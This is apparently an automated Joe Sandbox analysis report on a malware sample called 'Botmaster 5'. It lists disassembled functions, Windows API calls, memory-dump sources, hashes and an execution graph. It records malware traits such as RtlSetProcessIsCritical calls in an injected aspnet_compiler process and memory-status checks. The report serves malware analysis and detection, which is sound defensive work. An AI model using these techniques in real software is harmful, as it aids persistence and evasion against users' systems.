                                                                                                                                                                                                                    • Part of subcall function 004250D2: GetWindowLongW.USER32(00425167,000000F0), ref: 004250DA
                                                                                                                                                                                                                    • Part of subcall function 004250D2: GetParent.USER32(?), ref: 004250F0
                                                                                                                                                                                                                    • Part of subcall function 004250D2: MapWindowPoints.USER32(00000000,00000000), ref: 004250F9
                                                                                                                                                                                                                    • Part of subcall function 004250D2: MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,?), ref: 00425118
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Window$CursorLongMessageMoveParentPointsSend
                                                                                                                                                                                                                  • String ID: UB
                                                                                                                                                                                                                  • API String ID: 3529013150-2945346352
                                                                                                                                                                                                                  • Opcode ID: 2fe4f75bd51d96e705ef4f7f2243fdb1896055f6b1a6de405ca2799f246099de
                                                                                                                                                                                                                  • Instruction ID: 80ddffc3631a2bf647b041aadb81eaadd75b3d48d678cbae6118595845ada95b
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2fe4f75bd51d96e705ef4f7f2243fdb1896055f6b1a6de405ca2799f246099de
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10F03032200519BBCF026F56EC058AB3F26FF85360B454425FD184A561DBB2D931DBE5
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004235A7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ParentProp
                                                                                                                                                                                                                  • String ID: PB_WindowID
                                                                                                                                                                                                                  • API String ID: 919147419-1508741625
                                                                                                                                                                                                                  • Opcode ID: 396bd6a40820f64989488b527c2c300b8788c169ae788e6e2a4634b305a73a35
                                                                                                                                                                                                                  • Instruction ID: 11212b052304e6bbf0ce83fb4ca3601bb844d6aabc858b0d1897a161b173dd91
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 396bd6a40820f64989488b527c2c300b8788c169ae788e6e2a4634b305a73a35
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 60D0C2323012317702200A1A7C84D4BAAACBEA8B663114023F609D3210D2A8ED4086B9
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004281B1 Relevance: 5.1, APIs: 4, Instructions: 138memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000022,-FFFFFEC7,?,0045DF26,00000002,?,00427B94,?,-FFFFFEC7,?,00000002,0041CDD7,?,?,?,?), ref: 004281C9
                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,-FFFFFEC7,?,0045DF26,00000002,?,00427B94,?,-FFFFFEC7,?,00000002,0041CDD7,?,?,?), ref: 0042827D
                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,00427B94,?,-FFFFFEC7,?,00000002,0041CDD7,?,?,?,?), ref: 0042829D
                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(-0000001E,?,00427B94,?,-FFFFFEC7,?,00000002,0041CDD7,?,?,?,?), ref: 004282F5
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AllocCriticalHeapSection$EnterLeave
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 830345296-0
                                                                                                                                                                                                                  • Opcode ID: b10828d24017c6d80b30961d89e64b5d5b0f883ca99066ed852a8e364b72b161
                                                                                                                                                                                                                  • Instruction ID: 20cd76c908f96eb125e33e19059393abe1b5f7203d4d392583998afbdc725ccb
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b10828d24017c6d80b30961d89e64b5d5b0f883ca99066ed852a8e364b72b161
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E15107B1602B25DFC324CF58E88092AB7F4FB18700354896EE4A6C7B41DB74F855CBA9
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004277D8 Relevance: 5.1, APIs: 4, Instructions: 138memorystringCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                    • Part of subcall function 004276F3: HeapFree.KERNEL32(00000000,?,?,?,00000000,00000000,0042780F,00000000,?,?,00000007), ref: 0042771F
                                                                                                                                                                                                                    • Part of subcall function 004276F3: HeapFree.KERNEL32(00000000,?,?,?,00000000,00000000,0042780F,00000000,?,?,00000007), ref: 00427730
                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000007), ref: 004278B3
                                                                                                                                                                                                                  • strlen.MSVCRT ref: 00427914
                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000001,?,?,?,00000007), ref: 00427924
                                                                                                                                                                                                                  • strcpy.MSVCRT(00000000,?,?,?,?,00000007), ref: 00427937
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Heap$AllocFree$strcpystrlen
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3813932142-0
                                                                                                                                                                                                                  • Opcode ID: 9d3955768ac5938e31f3eca2529e770b148a2a4aecfb0a20d71aa1de34f90c88
                                                                                                                                                                                                                  • Instruction ID: fdc59b1367c7b7af7048d231e3b7867b608d3a542b4010da8e7dcbfc790f71a2
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d3955768ac5938e31f3eca2529e770b148a2a4aecfb0a20d71aa1de34f90c88
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A514A70A04625EFCB14DF68E880A6ABBF1FF08344B60856EE445EB311D774E991CB99
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0041B94E Relevance: 5.1, APIs: 4, Instructions: 91memoryfileCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • ReadFile.KERNEL32(009A1000,00000000,00000001,009A1000,00000000,009A1000,?,?,?,00464CAB,00000000), ref: 0041B97F
                                                                                                                                                                                                                  • HeapReAlloc.KERNEL32(009A0000,00000008,00000000,00000000,?,00000000,00000001), ref: 0041B9AF
                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,009A1000,?,?,?,00464CAB,00000000), ref: 0041BA46
                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,-00000001,?,?,?,00464CAB,00000000), ref: 0041BA64
                                                                                                                                                                                                                  • HeapFree.KERNEL32(009A0000,00000000,00000000,?,?,00464CAB,00000000), ref: 0041BA70
                                                                                                                                                                                                                    • Part of subcall function 0041BC80: memcpy.MSVCRT ref: 0041BCCC
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ByteCharHeapMultiWide$AllocFileFreeReadmemcpy
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 4000894326-0
                                                                                                                                                                                                                  • Opcode ID: 0cdc74bec532fd1f1c03f8687c89bb561b0a8013a46f6137e6f2faae7c044436
                                                                                                                                                                                                                  • Instruction ID: 6ac8cef49e67c40542f08e8ca529e6df0e5cc99836113e131dcfe6a943ea42c3
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0cdc74bec532fd1f1c03f8687c89bb561b0a8013a46f6137e6f2faae7c044436
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B531F471248341AAD730CF289C09FE7BB94EB45364F14461EF290562C0D7B8A88AC7EB
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00429BD0 Relevance: 5.1, APIs: 4, Instructions: 62memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • wcslen.MSVCRT ref: 00429BE5
                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00990000,00000000,0000000A), ref: 00429C09
                                                                                                                                                                                                                  • HeapReAlloc.KERNEL32(00990000,00000000,00000000,0000000A), ref: 00429C2D
                                                                                                                                                                                                                  • HeapFree.KERNEL32(00990000,00000000,00000000,?,?,0040A00F,?,2.33,00411577,00000008,00000000,00469160,00000007,0040108F,00000000), ref: 00429C64
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Heap$Alloc$Freewcslen
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2479713791-0
                                                                                                                                                                                                                  • Opcode ID: ba7f482c58f58616395a3bfa25ab1ce6513749a3abf50b8aa195bddbbd49a93b
                                                                                                                                                                                                                  • Instruction ID: 41747706aece4ea1ef8a9959e04ffd6483e768f3759c1230f3140f6c21c769af
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba7f482c58f58616395a3bfa25ab1ce6513749a3abf50b8aa195bddbbd49a93b
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28215E74600209EFDB04CF94E880FAAB7B9FB09304F108159F8098B340D775EE81CB98
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004283C9 Relevance: 5.0, APIs: 4, Instructions: 47memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000020,?,00001000,?,00000000,004284AF,00001000,?,00001000,00000000,00427B38,?,00001000), ref: 004283DC
                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,00001000,?,00000000,004284AF,00001000,?,00001000,00000000,00427B38,?,00001000), ref: 004283F9
                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,00001000,?,00000000,004284AF,00001000,?,00001000,00000000,00427B38,?,00001000), ref: 00428411
                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(-00000020,?,00001000,?,00000000,004284AF,00001000,?,00001000,00000000,00427B38,?,00001000), ref: 0042842A
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CriticalFreeHeapSection$EnterLeave
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1298188129-0
                                                                                                                                                                                                                  • Opcode ID: 18edb3ecb8859fbce22d22cb6228e96749d539742696803351185c5004ee298a
                                                                                                                                                                                                                  • Instruction ID: 5008b00f2070bfcef8f58cbee9b473e8808a58353c6e0211f4292745f220e25a
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18edb3ecb8859fbce22d22cb6228e96749d539742696803351185c5004ee298a
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50012C72702A289FC6209F9AEC8082BB7E9EB45755395442EE48193610EB76BC41CF5A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                  Execution Coverage:15.6%
                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                  Total number of Nodes:58
                                                                                                                                                                                                                  Total number of Limit Nodes:13
                                                                                                                                                                                                                  execution_graph 23277 296c040 23279 296c049 23277->23279 23278 296c0b7 23279->23278 23282 296c98d 23279->23282 23287 296c749 23279->23287 23284 296c81b 23282->23284 23283 296c933 23283->23279 23284->23283 23292 296caf8 23284->23292 23296 296cae8 23284->23296 23289 296c782 23287->23289 23288 296c933 23288->23279 23289->23288 23290 296caf8 3 API calls 23289->23290 23291 296cae8 3 API calls 23289->23291 23290->23289 23291->23289 23294 296cb21 23292->23294 23293 296ce76 23294->23293 23300 296da40 23294->23300 23298 296cb21 23296->23298 23297 296ce76 23298->23297 23299 296da40 3 API calls 23298->23299 23299->23298 23304 5c82d60 23300->23304 23308 5c82d51 23300->23308 23301 296d941 23306 5c82d8c 23304->23306 23305 5c8301a 23305->23301 23306->23305 23312 5c83120 23306->23312 23310 5c82d60 23308->23310 23309 5c8301a 23309->23301 23310->23309 23311 5c83120 3 API calls 23310->23311 23311->23310 23316 5c83158 23312->23316 23324 5c83168 23312->23324 23313 5c8313e 23313->23306 23317 5c8319d 23316->23317 23318 5c83175 23316->23318 23332 5c81b44 23317->23332 23318->23313 23320 5c831be 23320->23313 23322 5c83286 GlobalMemoryStatusEx 23323 5c832b6 23322->23323 23323->23313 23325 5c8319d 23324->23325 23326 5c83175 23324->23326 23327 5c81b44 GlobalMemoryStatusEx 23325->23327 23326->23313 23328 5c831ba 23327->23328 23329 5c831be 23328->23329 23330 5c83286 GlobalMemoryStatusEx 23328->23330 23329->23313 23331 5c832b6 23330->23331 23331->23313 23333 5c83240 GlobalMemoryStatusEx 23332->23333 23335 5c831ba 23333->23335 23335->23320 23335->23322 23336 296683f 23340 296b690 23336->23340 23344 296b680 23336->23344 23337 2965d4a 23342 296b6ab 23340->23342 23343 296b6a5 23342->23343 23348 2969344 23342->23348 23343->23337 23345 296b690 23344->23345 23346 2969344 RtlSetProcessIsCritical 23345->23346 23347 296b6a5 23345->23347 23346->23345 23347->23337 23349 296bb98 RtlSetProcessIsCritical 23348->23349 23351 296bc39 23349->23351 23351->23342

                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                  Function 05C83168 Relevance: 1.6, APIs: 1, Instructions: 130COMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 2121 5c83168-5c83173 2122 5c8319d-5c831bc call 5c81b44 2121->2122 2123 5c83175-5c8319c call 5c81b38 2121->2123 2129 5c831be-5c831c1 2122->2129 2130 5c831c2-5c83221 2122->2130 2136 5c83223-5c83226 2130->2136 2137 5c83227-5c832b4 GlobalMemoryStatusEx 2130->2137 2141 5c832bd-5c832e5 2137->2141 2142 5c832b6-5c832bc 2137->2142 2142->2141
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000009.00000002.3690575991.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_5c80000_aspnet_compiler.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 132bc78227cb6f8e55f8b31d94048c93ca61be7fbf3dbdcc824d8680414d46d5
                                                                                                                                                                                                                  • Instruction ID: b52bd2d0c0e50843989f472ef95db7657c1f708c5fd279718467fc3a01deb18b
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 132bc78227cb6f8e55f8b31d94048c93ca61be7fbf3dbdcc824d8680414d46d5
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D410572D043998FCB04DFAAD8046AEBBF5BF89620F15896AD404A7341DB749945CBD0
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0296BB17 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • RtlSetProcessIsCritical.NTDLL(?,?), ref: 0296BC2A
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000009.00000002.3635879102.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_2960000_aspnet_compiler.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CriticalProcess
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2695349919-0
                                                                                                                                                                                                                  • Opcode ID: 007d6b92516ff69d5b9b091627ac1bd2e106f2329c2f408fcc5daf7522e4c4de
                                                                                                                                                                                                                  • Instruction ID: 1430cfcb8bc741b3a97789c2f26816da555759b02fcb0429787871e66303623f
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 007d6b92516ff69d5b9b091627ac1bd2e106f2329c2f408fcc5daf7522e4c4de
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E31BCB28012498FDB10CF69D885BEEBFF4EF1A210F18849ED455A7282D3389A44CF60
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 02969328 Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • RtlSetProcessIsCritical.NTDLL(?,?), ref: 0296BC2A
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000009.00000002.3635879102.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_2960000_aspnet_compiler.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CriticalProcess
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2695349919-0
                                                                                                                                                                                                                  • Opcode ID: 1ef748263dd4b118d4662ceafb3cc532342afae4104dbcaff8c1d14356e196c7
                                                                                                                                                                                                                  • Instruction ID: f50e2eb7ce379f81be7ad29bcb5580c6404f7a02846d91247da6e91f8c6a38c6
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ef748263dd4b118d4662ceafb3cc532342afae4104dbcaff8c1d14356e196c7
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4031BFB18053598FCB11CFAAD484BEEBFF4EF59310F14805AD449A3281D3389944CFA1
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 02969344 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • RtlSetProcessIsCritical.NTDLL(?,?), ref: 0296BC2A
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000009.00000002.3635879102.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_2960000_aspnet_compiler.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CriticalProcess
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2695349919-0
                                                                                                                                                                                                                  • Opcode ID: 4e899f3c543e80f1bf9b4d3df8e288b9d49c7151f75cf0ce99aabe7c86c34a8c
                                                                                                                                                                                                                  • Instruction ID: 329090013c0278635ba5c1a2221ae3721dd253a5dcd1ca3d0b00303046644228
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e899f3c543e80f1bf9b4d3df8e288b9d49c7151f75cf0ce99aabe7c86c34a8c
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF217AB1801259CFCB10CF9AD884BEEBBF4EF59310F14806AE459A3280D338AA44DF61
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0296BB90 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • RtlSetProcessIsCritical.NTDLL(?,?), ref: 0296BC2A
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000009.00000002.3635879102.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_2960000_aspnet_compiler.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CriticalProcess
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2695349919-0
